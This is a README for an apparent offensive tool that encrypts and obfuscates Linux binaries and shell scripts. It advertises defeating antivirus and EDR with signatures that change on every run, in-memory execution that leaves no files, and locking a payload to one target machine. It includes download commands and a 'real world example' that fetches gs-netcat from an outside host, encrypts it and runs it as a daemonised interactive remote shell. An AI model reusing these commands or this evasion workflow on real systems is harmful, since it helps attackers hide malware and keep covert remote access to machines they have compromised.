- Obfuscate & encrypt any ELF binary
- Obfuscate & encrypt any SHELL-script
- AV/EDR death: Morphing + different signature every time
- 100% in-memory. No temporary files
- Not soiling the filesystem
- Double or triple encrypt the same binary (or itself)
- Resulting binary is heavily obfuscated (
stringonly shows garbage) - Living off the Land (LotL): Only needs
/bin/sh+perl+openssl - Architecture agnostic: Works on x86_64, aarch64, arm6, mips, ...
- Lock a binary to a target system and make it fail to run anywhere else.
Download:
curl -SsfL https://github.com/hackerschoice/bincrypter/releases/latest/download/bincrypter -o bincrypter
chmod +x bincrypter
./bincrypter -hExample:
cp /usr/bin/id id
./bincrypter id
# Compressed: 68552 --> 24176 [35%]
./id
# uid=0(root) gid=0(root) groups=0(root)Set a custom PASSWORD (optionally):
cp /usr/bin/id id
./bincrypter id foobar
# Compressed: 68552 --> 23860 [34%]
./id
# Enter Password: foobar
# uid=0(root) gid=0(root) groups=0(root)Real world example:
curl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsncOther great work:
https://github.com/guitmz/ezuri
https://github.com/upx/upx
https://bitlackeys.org/#sherlocked
Join the fun: https://thc.org/ops
bsky: @hackerschoice.bsky.social
Mastodon: @thc@infosec.exchange
